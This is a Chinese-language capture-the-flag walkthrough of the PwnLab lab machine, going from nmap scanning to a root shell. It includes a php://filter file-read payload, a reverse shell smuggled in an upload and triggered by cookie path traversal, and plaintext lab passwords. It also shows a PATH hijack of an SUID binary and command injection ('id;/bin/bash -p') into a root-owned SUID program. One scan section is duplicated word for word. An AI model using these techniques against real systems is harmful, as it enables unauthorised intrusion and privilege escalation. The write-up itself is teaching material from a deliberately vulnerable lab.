靶机环境介绍
https://www.vulnhub.com/entry/skytower-1,96/
靶机IP:192.168.56.103
kali IP:192.168.56.102
nmap扫描
端口扫描
# Nmap 7.93 scan initiated Mon Jul 10 02:36:32 2023 as: nmap -Pn --min-rate=10000 -p- -oN nmap/ports 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
39285/tcp open unknown
MAC Address: 08:00:27:4E:3E:AA (Oracle VirtualBox virtual NIC)
# Nmap done at Mon Jul 10 02:36:47 2023 -- 1 IP address (1 host up) scanned in 15.95 seconds
服务扫描
# Nmap 7.93 scan initiated Mon Jul 10 02:38:36 2023 as: nmap -sVC -O -p80,111,3306,39285 -oN nmap/details 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.00074s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39285/tcp status
| 100024 1 41776/tcp6 status
| 100024 1 50160/udp6 status
|_ 100024 1 54782/udp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 41
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Support41Auth, ConnectWithDatabase, InteractiveClient, LongColumnFlag, LongPassword, SupportsTransactions, FoundRows, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, SupportsCompression, Speaks41ProtocolOld, Speaks41ProtocolNew, IgnoreSigpipes, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: *}^>W|+\o;t[H7z$@UlA
|_ Auth Plugin Name: mysql_native_password
39285/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:4E:3E:AA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 10 02:38:57 2023 -- 1 IP address (1 host up) scanned in 24.39 seconds
漏洞扫描
# Nmap 7.93 scan initiated Mon Jul 10 02:38:36 2023 as: nmap -sVC -O -p80,111,3306,39285 -oN nmap/details 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.00074s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39285/tcp status
| 100024 1 41776/tcp6 status
| 100024 1 50160/udp6 status
|_ 100024 1 54782/udp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 41
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Support41Auth, ConnectWithDatabase, InteractiveClient, LongColumnFlag, LongPassword, SupportsTransactions, FoundRows, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, SupportsCompression, Speaks41ProtocolOld, Speaks41ProtocolNew, IgnoreSigpipes, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: *}^>W|+\o;t[H7z$@UlA
|_ Auth Plugin Name: mysql_native_password
39285/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:4E:3E:AA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 10 02:38:57 2023 -- 1 IP address (1 host up) scanned in 24.39 seconds
扫描总结
通过阅读nmap扫描结果,发现开放了80,111,3306,39285端口,由于111和39285都是rpc服务,这里先渗透80端口,然后再3306端口。
80端口
边浏览网页,边进行目录爆破。
目录爆破
┌──(kali㉿kali)-[~/oscp/14.PWNLAB-INIT]
└─$ sudo gobuster dir --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,rar,txt,html,jsp,zip -u http://192.168.56.103 | tee gobuster.log
[sudo] kali 的密码:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,rar,html,jsp,zip
[+] Timeout: 10s
===============================================================
2023/07/11 02:54:56 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 332]
/.html (Status: 403) [Size: 294]
/images (Status: 301) [Size: 317] [--> http://192.168.56.103/images/]
/.php (Status: 403) [Size: 293]
/login.php (Status: 200) [Size: 250]
/upload (Status: 301) [Size: 317] [--> http://192.168.56.103/upload/]
/upload.php (Status: 200) [Size: 19]
/config.php (Status: 200) [Size: 0]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1543911 / 1543927 (100.00%)
===============================================================
2023/07/11 03:00:38 Finished
===============================================================
通过阅读网页,源码没发现什么有效信息,登录界面尝试使用万能密码和默认凭据是,发现无法成功,但通过访问login页面和upload页面,发现url可能存在文件包含。于是接下来尝试使用php伪协议进行利用。
LFI利用
由于网站里使用的文件包含会立即执行php代码,所以这里需要将其编码,这样才会显示出来,所以使用这个php://filter,而这个的具体构造语句如下:?file=php://filter/read=convert.base64-encode/resource=文件路径
拿去解码,将解码后的保存到本地。
通过之前浏览网站,需要获取的文档有以下几个:index,login,upload,对保存下来的php代码进行审计,首先是index,比较感兴趣的是这个,他通过cookie,包含了lang的参数,需要留意。
然后是login,这里比较感兴趣的是:
这里需要用到config.php,同样使用伪协议http://192.168.56.103/?page=php://filter/read=convert.base64-encode/resource=config(不知道为什么这里使用config.php无法显示,而使用config可以)下载到编码后的代码,解码后保存。
最后是uploads,这里写了上传的限制,需要绕过的话还需要仔细阅读,这里先尝试获取凭据登录,这样才会到这一步。
在上面的config.php中获得一个root凭据,尝试登录web端页面,发现无效。于是联想到开放了3306端口,尝试登录。发现成功。
3306端口
发现三个用户,发现密码进行base64编码,解码!
尝试使用以上凭据登录,发现能成功,这样就进行到上传文件阶段啦。
回到80端口
文件上传
通过代码审计,发现只能上传白名单中的后缀名的文件,且需要有mime文件头。
这里通过构造文件。通过抓包查看数据,在文件的最后我插入了反弹shell。
上传成功,但是如何执行这个反弹shell呢?还是通过代码审计,在之前的index文件中,发现通过包含cookie中的lang值,可以进行php解析。
这里构造cookie时记得返回上一级。
获得立足点
查看passwd文件,发现存在之前在mysql中查询到的用户,这里尝试切换用户,发现报错,使用python提升一下交互性。
www-data@pwnlab:/var/www/html$ su su kent
su kent
su: must be run from a terminal
www-data@pwnlab:/var/www/html$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
横向移动
切换用户到kent,回到/home/kent未发现有用信息,切换到mike,发现验证错误,于是尝试切换到kane,成功,进入/home/kane,发现存在msg2mike。
kent@pwnlab:~$ su mike
su mike
Password: SIfdsTEn6I
su: Authentication failure
kent@pwnlab:~$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:/home/kent$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ls
msgmike
kane@pwnlab:~$ ls -liah ls -liah
ls -liah
total 32K
65 drwxr-x--- 2 kane kane 4.0K Jul 11 11:19 .
1558 drwxr-xr-x 6 root root 4.0K Mar 17 2016 ..
30347 -rw------- 1 kane kane 164 Jul 11 10:44 .bash_history
78 -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
73 -rw-r--r-- 1 kane kane 3.5K Mar 17 2016 .bashrc
27221 -rwsr-sr-x 1 mike mike 5.1K Mar 17 2016 msgmike
75 -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
发现msgmike是s权限文件。先使用strings文件查看内容。
这里发现它使用了cat命令,但是没有使用绝对路径,可以尝试命令劫持。
kane@pwnlab:~$ echo $$ # 查看shell的process id
echo $$
5041
kane@pwnlab:~$ echo "/bin/bash" >/tmp/cat # 将 /bin/bash 写入/tmp/cat中
echo "/bin/bash" > /tmp/cat
kane@pwnlab:~$ echo $PATH # 查看当前$PATH
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ export PATH=/tmp:$PATH # 将/tmp路径放到$PATH最前面
export PATH=/tmp:$PATH
kane@pwnlab:~$ echo $PATH # 查看修改后的$PATH
echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ ./msgmike # 执行msgmike
./msgmike
mike@pwnlab:~$ echo $$ # 查看shell的process id ,发现已经不同了 说明这里已经成功了
echo $$
5055
mike@pwnlab:~$ whoami # 发现已经是mike用户了
whoami
mike
mike@pwnlab:~$ whoami
whoami
mike
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -liah
ls -liah
total 28K
63 drwxr-x--- 2 mike mike 4.0K Mar 17 2016 .
1558 drwxr-xr-x 6 root root 4.0K Mar 17 2016 ..
74 -rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
70 -rw-r--r-- 1 mike mike 3.5K Mar 17 2016 .bashrc
27220 -rwsr-sr-x 1 root root 5.3K Mar 17 2016 msg2root
71 -rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
使用strings 查看msg2root内容,
发现执行了该命令,/bin/echo %s >> /root/messages.txt 这句话是将语句输入到/root/messages.txt,那如果语句是这个id;id;呢?那就会变成/bin/echo id;id; >> /root/messages.txt ,会输出id的内容!
尝试一下,思路是否正确。
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id;id;
id;id;
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
成功了,还是root用户!
提权
既然是root用户, 那就起一个bash环境。
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id;/bin/bash -p
id;/bin/bash -p
id
bash-4.3# echo $PATH # 这里记得将$PATH修改回去,因为之前修改的cat和$PATH可能还会生效,下面是我修改后的
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
bash-4.3# whoami
whoami
root
bash-4.3# uname -a
uname -a
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
bash-4.3# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:4e:3e:aa brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe4e:3eaa/64 scope link
valid_lft forever preferred_lft forever
bash-4.3# cat /root/flag.txt
cat /root/flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
总结
1、发现文件上传漏洞时,可以使用php伪协议等获取源码,见参考1;
2、需要具备代码审计能力,文件上传绕过等还需要加强;
3、发现凭据时,要进行密码碰撞,不要仅仅局限在某个服务上;
4、获取某用户shell后,应该回到其家目录下寻找有用信息;
5、出现su: must be run from a terminal等情况,应该使用python的pty提高shell交互性;
6、发现可执行文件时,可以使用strings工具查看其内容;
7、命令劫持时,需要修改$PATH变量,可以通过$$查看当前SHELL的PID;
8、发现shell语句时,要想办法绕过,例如/bin/echo %s >> /root/messages.txt,可以使用分隔符结束命令,然后写入其他命令。
参考
1、https://blog.csdn.net/qq_53079406/article/details/125915640
2、https://cyberchef.org/
3、https://www.bilibili.com/video/BV13c411V7dY
3041
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
